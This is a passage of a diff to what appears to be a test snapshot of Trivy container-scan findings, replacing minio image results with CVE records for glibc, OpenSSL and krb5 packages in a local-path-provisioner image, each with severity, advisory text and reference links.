"https://ubuntu.com/security/CVE-2019-1010024", + "https://www.cve.org/CVERecord?id=CVE-2019-1010024", + ], + }, + "category": "Vulnerability", + "description": "** DISPUTED ** GNU Libc current is affected by: Mitigation bypass. The impact is: Attacker may bypass ASLR using cache of thread stack and heap. The component is: glibc. NOTE: Upstream comments indicate "this is being treated as a non-security bug and no real threat."", + "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", + "mitigation": undefined, + "name": "glibc: ASLR bypass using cache of thread stack and heap", + "references": [ { "type": "URL", - "value": "http://www.mandriva.com/security/advisories?name=MDVSA-2012:058", + "value": "https://avd.aquasec.com/nvd/cve-2019-1010024", }, { "type": "URL", - "value": "http://www.opera.com/docs/changelogs/mac/1151/", + "value": "http://www.securityfocus.com/bid/109162", }, { "type": "URL", - "value": "http://www.opera.com/docs/changelogs/mac/1160/", + "value": "https://access.redhat.com/security/cve/CVE-2019-1010024", }, { "type": "URL", - "value": "http://www.opera.com/docs/changelogs/unix/1151/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-1010024", }, { "type": "URL", - "value": "http://www.opera.com/docs/changelogs/unix/1160/", + "value": "https://security-tracker.debian.org/tracker/CVE-2019-1010024", }, { "type": "URL", - "value": "http://www.opera.com/docs/changelogs/windows/1151/", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22852", }, { "type": "URL", - "value": "http://www.opera.com/docs/changelogs/windows/1160/", + "value": "https://support.f5.com/csp/article/K06046097", }, { "type": "URL", - "value": "http://www.opera.com/support/kb/view/1004/", + "value": "https://support.f5.com/csp/article/K06046097?utm_source=f5support&utm_medium=RSS", }, { "type": "URL", - "value": "http://www.oracle.com/technetwork/topics/security/cpujan2015-1972971.html", + "value": "https://ubuntu.com/security/CVE-2019-1010024", }, { "type": "URL", - "value": "http://www.oracle.com/technetwork/topics/security/cpujul2015-2367936.html", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-1010024", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/local-path-provisioner:v0.0.22-kind.0 (debian 11.6)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-1010025", + "installedVersion": "2.31-13+deb11u5", + "packageName": "libc6", + "references": [ + "https://access.redhat.com/security/cve/CVE-2019-1010025", + "https://nvd.nist.gov/vuln/detail/CVE-2019-1010025", + "https://security-tracker.debian.org/tracker/CVE-2019-1010025", + "https://sourceware.org/bugzilla/show_bug.cgi?id=22853", + "https://support.f5.com/csp/article/K06046097", + "https://support.f5.com/csp/article/K06046097?utm_source=f5support&utm_medium=RSS", + "https://ubuntu.com/security/CVE-2019-1010025", + "https://www.cve.org/CVERecord?id=CVE-2019-1010025", + ], + }, + "category": "Vulnerability", + "description": "** DISPUTED ** GNU Libc current is affected by: Mitigation bypass. The impact is: Attacker may guess the heap addresses of pthread_created thread. The component is: glibc. NOTE: the vendor's position is "ASLR bypass itself is not a vulnerability."", + "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", + "mitigation": undefined, + "name": "glibc: information disclosure of heap addresses of pthread_created thread", + "references": [ { "type": "URL", - "value": "http://www.oracle.com/technetwork/topics/security/javacpuoct2011-443431.html", + "value": "https://avd.aquasec.com/nvd/cve-2019-1010025", }, { "type": "URL", - "value": "http://www.redhat.com/support/errata/RHSA-2011-1384.html", + "value": "https://access.redhat.com/security/cve/CVE-2019-1010025", }, { "type": "URL", - "value": "http://www.redhat.com/support/errata/RHSA-2012-0006.html", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-1010025", }, { "type": "URL", - "value": "http://www.securityfocus.com/bid/49388", + "value": "https://security-tracker.debian.org/tracker/CVE-2019-1010025", }, { "type": "URL", - "value": "http://www.securityfocus.com/bid/49778", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22853", }, { "type": "URL", - "value": "http://www.securitytracker.com/id/1029190", + "value": "https://support.f5.com/csp/article/K06046097", }, { "type": "URL", - "value": "http://www.securitytracker.com/id?1025997", + "value": "https://support.f5.com/csp/article/K06046097?utm_source=f5support&utm_medium=RSS", }, { "type": "URL", - "value": "http://www.securitytracker.com/id?1026103", + "value": "https://ubuntu.com/security/CVE-2019-1010025", }, { "type": "URL", - "value": "http://www.securitytracker.com/id?1026704", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-1010025", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/local-path-provisioner:v0.0.22-kind.0 (debian 11.6)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-9192", + "installedVersion": "2.31-13+deb11u5", + "packageName": "libc6", + "references": [ + "https://access.redhat.com/security/cve/CVE-2019-9192", + "https://nvd.nist.gov/vuln/detail/CVE-2019-9192", + "https://sourceware.org/bugzilla/show_bug.cgi?id=24269", + "https://support.f5.com/csp/article/K26346590?utm_source=f5support&utm_medium=RSS", + "https://www.cve.org/CVERecord?id=CVE-2019-9192", + ], + }, + "category": "Vulnerability", + "description": "** DISPUTED ** In the GNU C Library (aka glibc or libc6) through 2.29, check_dst_limits_calc_pos_1 in posix/regexec.c has Uncontrolled Recursion, as demonstrated by '(|)(\\\\1\\\\1)*' in grep, a different issue than CVE-2018-20796. NOTE: the software maintainer disputes that this is a vulnerability because the behavior occurs only with a crafted pattern.", + "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", + "mitigation": undefined, + "name": "glibc: uncontrolled recursion in function check_dst_limits_calc_pos_1 in posix/regexec.c", + "references": [ { "type": "URL", - "value": "http://www.ubuntu.com/usn/USN-1263-1", + "value": "https://avd.aquasec.com/nvd/cve-2019-9192", }, { "type": "URL", - "value": "http://www.us-cert.gov/cas/techalerts/TA12-010A.html", + "value": "https://access.redhat.com/security/cve/CVE-2019-9192", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2011-3389", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-9192", }, { "type": "URL", - "value": "https://blogs.oracle.com/sunsecurity/entry/multiple_vulnerabilities_in_fetchmail", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=24269", }, { "type": "URL", - "value": "https://bugzilla.novell.com/show_bug.cgi?id=719047", + "value": "https://support.f5.com/csp/article/K26346590?utm_source=f5support&utm_medium=RSS", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=737506", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-9192", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": "1.1.1n-0+deb11u5", + "foundIn": "Target: 'docker.io/kindest/local-path-provisioner:v0.0.22-kind.0 (debian 11.6)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2023-0464", + "installedVersion": "1.1.1n-0+deb11u4", + "packageName": "libssl1.1", + "references": [ + "https://access.redhat.com/security/cve/CVE-2023-0464", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0464", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2017771e2db3e2b96f89bbe8766c3209f6a99545", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2dcd4f1e3115f38cefa43e3efbe9b801c27e642e", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=879f7080d7e141f415c79eaa3a8ac4a3dad0348b", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=959c59c7a0164117e7f8366466a32bb1f8d77ff1", + "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", + "https://nvd.nist.gov/vuln/detail/CVE-2023-0464", + "https://ubuntu.com/security/notices/USN-6039-1", + "https://www.cve.org/CVERecord?id=CVE-2023-0464", + "https://www.debian.org/security/2023/dsa-5417", + "https://www.openssl.org/news/secadv/20230322.txt", + ], + }, + "category": "Vulnerability", + "description": +"A security vulnerability has been identified in all supported versions + +of OpenSSL related to the verification of X.509 certificate chains +that include policy constraints. Attackers may be able to exploit this +vulnerability by creating a malicious certificate chain that triggers +exponential use of computational resources, leading to a denial-of-service +(DoS) attack on affected systems. + +Policy processing is disabled by default but can be enabled by passing +the \`-policy' argument to the command line utilities or by calling the +\`X509_VERIFY_PARAM_set1_policies()' function." +, + "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", + "mitigation": undefined, + "name": "Denial of service by excessive resource usage in verifying X509 policy constraints", + "references": [ { "type": "URL", - "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-556833.pdf", + "value": "https://avd.aquasec.com/nvd/cve-2023-0464", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3389", + "value": "https://access.redhat.com/security/cve/CVE-2023-0464", }, { "type": "URL", - "value": "https://docs.microsoft.com/en-us/security-updates/securitybulletins/2012/ms12-006", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0464", }, { "type": "URL", - "value": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c03839862", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2017771e2db3e2b96f89bbe8766c3209f6a99545", }, { "type": "URL", - "value": "https://hermes.opensuse.org/messages/13154861", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2dcd4f1e3115f38cefa43e3efbe9b801c27e642e", }, { "type": "URL", - "value": "https://hermes.opensuse.org/messages/13155432", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=879f7080d7e141f415c79eaa3a8ac4a3dad0348b", }, { "type": "URL", - "value": "https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=959c59c7a0164117e7f8366466a32bb1f8d77ff1", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2011-3389.html", + "value": "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2011-1380.html", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-0464", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2011-3389", + "value": "https://ubuntu.com/security/notices/USN-6039-1", }, { "type": "URL", - "value": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A14752", + "value": "https://www.cve.org/CVERecord?id=CVE-2023-0464", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-1263-1", + "value": "https://www.debian.org/security/2023/dsa-5417", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2011-3389", + "value": "https://www.openssl.org/news/secadv/20230322.txt", }, ], - "severity": "LOW", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": "1.18.3-6+deb11u3", - "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-42898", - "installedVersion": "1.18.3-6+deb11u1", - "packageName": "libgssapi-krb5-2", + "fixedVersion": "1.1.1n-0+deb11u5", + "foundIn": "Target: 'docker.io/kindest/local-path-provisioner:v0.0.22-kind.0 (debian 11.6)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2023-2650", + "installedVersion": "1.1.1n-0+deb11u4", + "packageName": "libssl1.1", "references": [ - "https://access.redhat.com/errata/RHSA-2022:8637", - "https://access.redhat.com/security/cve/CVE-2022-42898", - "https://bugzilla.redhat.com/2140960", - "https://bugzilla.redhat.com/show_bug.cgi?id=2140960", - "https://bugzilla.samba.org/show_bug.cgi?id=15203", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-42898", - "https://errata.almalinux.org/9/ALSA-2022-8637.html", - "https://errata.rockylinux.org/RLSA-2022:8637", - "https://github.com/heimdal/heimdal/security/advisories/GHSA-64mq-fvfj-5x3c", - "https://github.com/krb5/krb5/commit/ea92d2f0fcceb54a70910fa32e9a0d7a5afc3583", - "https://linux.oracle.com/cve/CVE-2022-42898.html", - "https://linux.oracle.com/errata/ELSA-2023-12104.html", - "https://mailman.mit.edu/pipermail/krbdev/2022-November/013576.html", - "https://nvd.nist.gov/vuln/detail/CVE-2022-42898", - "https://security.netapp.com/advisory/ntap-20230216-0008/", - "https://security.netapp.com/advisory/ntap-20230223-0001/", - "https://ubuntu.com/security/notices/USN-5800-1", - "https://ubuntu.com/security/notices/USN-5822-1", - "https://ubuntu.com/security/notices/USN-5822-2", - "https://ubuntu.com/security/notices/USN-5828-1", - "https://ubuntu.com/security/notices/USN-5936-1", - "https://web.mit.edu/kerberos/advisories/", - "https://web.mit.edu/kerberos/krb5-1.19/", - "https://web.mit.edu/kerberos/krb5-1.20/README-1.20.1.txt", - "https://www.cve.org/CVERecord?id=CVE-2022-42898", - "https://www.samba.org/samba/security/CVE-2022-42898.html", + "http://www.openwall.com/lists/oss-security/2023/05/30/1", + "https://access.redhat.com/security/cve/CVE-2023-2650", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-2650", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=423a2bc737a908ad0c77bda470b2b59dc879936b", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=853c5e56ee0b8650c73140816bb8b91d6163422c", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9e209944b35cf82368071f160a744b6178f9b098", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=db779b0e10b047f2585615e0b8f2acdf21f8544a", + "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", + "https://nvd.nist.gov/vuln/detail/CVE-2023-2650", + "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2023-0009", + "https://ubuntu.com/security/notices/USN-6119-1", + "https://www.cve.org/CVERecord?id=CVE-2023-2650", + "https://www.debian.org/security/2023/dsa-5417", + "https://www.openssl.org/news/secadv/20230530.txt", ], }, "category": "Vulnerability", - "description": "PAC parsing in MIT Kerberos 5 (aka krb5) before 1.19.4 and 1.20.x before 1.20.1 has integer overflows that may lead to remote code execution (in KDC, kadmind, or a GSS or Kerberos application server) on 32-bit platforms (which have a resultant heap-based buffer overflow), and cause a denial of service on other platforms. This occurs in krb5_pac_parse in lib/krb5/krb/pac.c. Heimdal before 7.7.1 has "a similar bug."", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "description": +"Issue summary: Processing some specially crafted ASN.1 object identifiers or +data containing them may be very slow. + +Impact summary: Applications that use OBJ_obj2txt() directly, or use any of +the OpenSSL subsystems OCSP, PKCS7/SMIME, CMS, CMP/CRMF or TS with no message +size limit may experience notable to very long delays when processing those +messages, which may lead to a Denial of Service. + +An OBJECT IDENTIFIER is composed of a series of numbers - sub-identifiers - +most of which have no size limit. OBJ_obj2txt() may be used to translate +an ASN.1 OBJECT IDENTIFIER given in DER encoding form (using the OpenSSL +type ASN1_OBJECT) to its canonical numeric text form, which are the +sub-identifiers of the OBJECT IDENTIFIER in decimal form, separated by +periods. + +When one of the sub-identifiers in the OBJECT IDENTIFIER is very large +(these are sizes that are seen as absurdly large, taking up tens or hundreds +of KiBs), the translation to a decimal number in text may take a very long +time. The time complexity is O(n^2) with 'n' being the size of the +sub-identifiers in bytes (*). + +With OpenSSL 3.0, support to fetch cryptographic algorithms using names / +identifiers in string form was introduced. This includes using OBJECT +IDENTIFIERs in canonical numeric text form as identifiers for fetching +algorithms. + +Such OBJECT IDENTIFIERs may be received through the ASN.1 structure +AlgorithmIdentifier, which is commonly used in multiple protocols to specify +what cryptographic algorithm should be used to sign or verify, encrypt or +decrypt, or digest passed data. + +Applications that call OBJ_obj2txt() directly with untrusted data are +affected, with any version of OpenSSL. If the use is for the mere purpose +of display, the severity is considered low. + +In OpenSSL 3.0 and newer, this affects the subsystems OCSP, PKCS7/SMIME, +CMS, CMP/CRMF or TS. It also impacts anything that processes X.509 +certificates, including simple things like verifying its signature. + +The impact on TLS is relatively low, because all versions of OpenSSL have a +100KiB limit on the peer's certificate chain. Additionally, this only +impacts clients, or servers that have explicitly enabled client +authentication. + +In OpenSSL 1.1.1 and 1.0.2, this only affects displaying diverse objects, +such as X.509 certificates. This is assumed to not happen in such a way +that it would cause a Denial of Service, so these versions are considered +not affected by this issue in such a way that it would be cause for concern, +and the severity is therefore considered low." +, + "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", "mitigation": undefined, - "name": "integer overflow vulnerabilities in PAC parsing", + "name": "Possible DoS translating ASN.1 object identifiers", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-42898", - }, - { - "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2022:8637", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-42898", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/2140960", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2140960", + "value": "https://avd.aquasec.com/nvd/cve-2023-2650", }, { "type": "URL", - "value": "https://bugzilla.samba.org/show_bug.cgi?id=15203", + "value": "http://www.openwall.com/lists/oss-security/2023/05/30/1", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-42898", + "value": "https://access.redhat.com/security/cve/CVE-2023-2650", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2022-8637.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-2650", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2022:8637", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=423a2bc737a908ad0c77bda470b2b59dc879936b", }, { "type": "URL", - "value": "https://github.com/heimdal/heimdal/security/advisories/GHSA-64mq-fvfj-5x3c", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=853c5e56ee0b8650c73140816bb8b91d6163422c", }, { "type": "URL", - "value": "https://github.com/krb5/krb5/commit/ea92d2f0fcceb54a70910fa32e9a0d7a5afc3583", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9e209944b35cf82368071f160a744b6178f9b098", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-42898.html", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=db779b0e10b047f2585615e0b8f2acdf21f8544a", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-12104.html", + "value": "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", }, { "type": "URL", - "value": "https://mailman.mit.edu/pipermail/krbdev/2022-November/013576.html", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-2650", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-42898", + "value": "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2023-0009", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20230216-0008/", + "value": "https://ubuntu.com/security/notices/USN-6119-1", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20230223-0001/", + "value": "https://www.cve.org/CVERecord?id=CVE-2023-2650", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5800-1", + "value": "https://www.debian.org/security/2023/dsa-5417", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5822-1", + "value": "https://www.openssl.org/news/secadv/20230530.txt", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": "1.1.1n-0+deb11u5", + "foundIn": "Target: 'docker.io/kindest/local-path-provisioner:v0.0.22-kind.0 (debian 11.6)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2023-0465", + "installedVersion": "1.1.1n-0+deb11u4", + "packageName": "libssl1.1", + "references": [ + "https://access.redhat.com/security/cve/CVE-2023-0465", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0465", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=10325176f3d3e98c6e2b3bf5ab1e3b334de6947a", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=1dd43e0709fece299b15208f36cc7c76209ba0bb", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=b013765abfa80036dc779dd0e50602c57bb3bf95", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=facfb1ab745646e97a1920977ae4a9965ea61d5c", + "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", + "https://nvd.nist.gov/vuln/detail/CVE-2023-0465", + "https://security.netapp.com/advisory/ntap-20230414-0001/", + "https://ubuntu.com/security/notices/USN-6039-1", + "https://www.cve.org/CVERecord?id=CVE-2023-0465", + "https://www.debian.org/security/2023/dsa-5417", + "https://www.openssl.org/news/secadv/20230328.txt", + ], + }, + "category": "Vulnerability", + "description": +"Applications that use a non-default option when verifying certificates may be +vulnerable to an attack from a malicious CA to circumvent certain checks. + +Invalid certificate policies in leaf certificates are silently ignored by +OpenSSL and other certificate policy checks are skipped for that certificate. +A malicious CA could use this to deliberately assert invalid certificate policies +in order to circumvent policy checking on the certificate altogether. + +Policy processing is disabled by default but can be enabled by passing +the \`-policy' argument to the command line utilities or by calling the +\`X509_VERIFY_PARAM_set1_policies()' function." +, + "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", + "mitigation": undefined, + "name": "Invalid certificate policies in leaf certificates are silently ignored", + "references": [ { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5822-2", + "value": "https://avd.aquasec.com/nvd/cve-2023-0465", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5828-1", + "value": "https://access.redhat.com/security/cve/CVE-2023-0465", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5936-1", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0465", }, { "type": "URL", - "value": "https://web.mit.edu/kerberos/advisories/", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=10325176f3d3e98c6e2b3bf5ab1e3b334de6947a", }, { "type": "URL", - "value": "https://web.mit.edu/kerberos/krb5-1.19/", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=1dd43e0709fece299b15208f36cc7c76209ba0bb", }, { "type": "URL", - "value": "https://web.mit.edu/kerberos/krb5-1.20/README-1.20.1.txt", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=b013765abfa80036dc779dd0e50602c57bb3bf95", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-42898", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=facfb1ab745646e97a1920977ae4a9965ea61d5c", }, { "type": "URL", - "value": "https://www.samba.org/samba/security/CVE-2022-42898.html", + "value": "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2018-5709", - "installedVersion": "1.18.3-6+deb11u1", - "packageName": "libgssapi-krb5-2", - "references": [ - "https://access.redhat.com/security/cve/CVE-2018-5709", - "https://github.com/poojamnit/Kerberos-V5-1.16-Vulnerabilities/tree/master/Integer%20Overflow", - "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", - "https://nvd.nist.gov/vuln/detail/CVE-2018-5709", - "https://www.cve.org/CVERecord?id=CVE-2018-5709", - ], - }, - "category": "Vulnerability", - "description": "An issue was discovered in MIT Kerberos 5 (aka krb5) through 1.16. There is a variable "dbentry->n_key_data" in kadmin/dbutil/dump.c that can store 16-bit data but unknowingly the developer has assigned a "u4" variable to it, which is for 32-bit data. An attacker can use this vulnerability to affect other artifacts of the database as we know that a Kerberos database dump file contains trusted data.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", - "mitigation": undefined, - "name": "krb5: integer overflow in dbentry->n_key_data in kadmin/dbutil/dump.c", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2018-5709", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-0465", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2018-5709", + "value": "https://security.netapp.com/advisory/ntap-20230414-0001/", }, { "type": "URL", - "value": "https://github.com/poojamnit/Kerberos-V5-1.16-Vulnerabilities/tree/master/Integer%20Overflow", + "value": "https://ubuntu.com/security/notices/USN-6039-1", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", + "value": "https://www.cve.org/CVERecord?id=CVE-2023-0465", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2018-5709", + "value": "https://www.debian.org/security/2023/dsa-5417", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2018-5709", + "value": "https://www.openssl.org/news/secadv/20230328.txt", }, ], - "severity": "LOW", + "severity": "MEDIUM", }, { "attributes": { - "fixedVersion": "1.18.3-6+deb11u3", - "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-42898", - "installedVersion": "1.18.3-6+deb11u1", - "packageName": "libk5crypto3", + "fixedVersion": "1.1.1n-0+deb11u5", + "foundIn": "Target: 'docker.io/kindest/local-path-provisioner:v0.0.22-kind.0 (debian 11.6)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2023-0466", + "installedVersion": "1.1.1n-0+deb11u4", + "packageName": "libssl1.1", "references": [ - "https://access.redhat.com/errata/RHSA-2022:8637", - "https://access.redhat.com/security/cve/CVE-2022-42898", - "https://bugzilla.redhat.com/2140960", - "https://bugzilla.redhat.com/show_bug.cgi?id=2140960", - "https://bugzilla.samba.org/show_bug.cgi?id=15203", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-42898", - "https://errata.almalinux.org/9/ALSA-2022-8637.html", - "https://errata.rockylinux.org/RLSA-2022:8637", - "https://github.com/heimdal/heimdal/security/advisories/GHSA-64mq-fvfj-5x3c", - "https://github.com/krb5/krb5/commit/ea92d2f0fcceb54a70910fa32e9a0d7a5afc3583", - "https://linux.oracle.com/cve/CVE-2022-42898.html", - "https://linux.oracle.com/errata/ELSA-2023-12104.html", - "https://mailman.mit.edu/pipermail/krbdev/2022-November/013576.html", - "https://nvd.nist.gov/vuln/detail/CVE-2022-42898", - "https://security.netapp.com/advisory/ntap-20230216-0008/", - "https://security.netapp.com/advisory/ntap-20230223-0001/", - "https://ubuntu.com/security/notices/USN-5800-1", - "https://ubuntu.com/security/notices/USN-5822-1", - "https://ubuntu.com/security/notices/USN-5822-2", - "https://ubuntu.com/security/notices/USN-5828-1", - "https://ubuntu.com/security/notices/USN-5936-1", - "https://web.mit.edu/kerberos/advisories/", - "https://web.mit.edu/kerberos/krb5-1.19/", - "https://web.mit.edu/kerberos/krb5-1.20/README-1.20.1.txt", - "https://www.cve.org/CVERecord?id=CVE-2022-42898", - "https://www.samba.org/samba/security/CVE-2022-42898.html", + "https://access.redhat.com/security/cve/CVE-2023-0466", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0466", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=0d16b7e99aafc0b4a6d729eec65a411a7e025f0a", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=51e8a84ce742db0f6c70510d0159dad8f7825908", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=73398dea26de9899fb4baa94098ad0a61f435c72", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=fc814a30fc4f0bc54fcea7d9a7462f5457aab061", + "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", + "https://nvd.nist.gov/vuln/detail/CVE-2023-0466", + "https://security.netapp.com/advisory/ntap-20230414-0001/", + "https://ubuntu.com/security/notices/USN-6039-1", + "https://www.cve.org/CVERecord?id=CVE-2023-0466", + "https://www.debian.org/security/2023/dsa-5417", + "https://www.openssl.org/news/secadv/20230328.txt", ], }, "category": "Vulnerability", - "description": "PAC parsing in MIT Kerberos 5 (aka krb5) before 1.19.4 and 1.20.x before 1.20.1 has integer overflows that may lead to remote code execution (in KDC, kadmind, or a GSS or Kerberos application server) on 32-bit platforms (which have a resultant heap-based buffer overflow), and cause a denial of service on other platforms. This occurs in krb5_pac_parse in lib/krb5/krb/pac.c. Heimdal before 7.7.1 has "a similar bug."", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "description": +"The function X509_VERIFY_PARAM_add0_policy() is documented to +implicitly enable the certificate policy check when doing certificate +verification. However the implementation of the function does not +enable the check which allows certificates with invalid or incorrect +policies to pass the certificate verification. + +As suddenly enabling the policy check could break existing deployments it was +decided to keep the existing behavior of the X509_VERIFY_PARAM_add0_policy() +function. + +Instead the applications that require OpenSSL to perform certificate +policy check need to use X509_VERIFY_PARAM_set1_policies() or explicitly +enable the policy check by calling X509_VERIFY_PARAM_set_flags() with +the X509_V_FLAG_POLICY_CHECK flag argument. + +Certificate policy checks are disabled by default in OpenSSL and are not 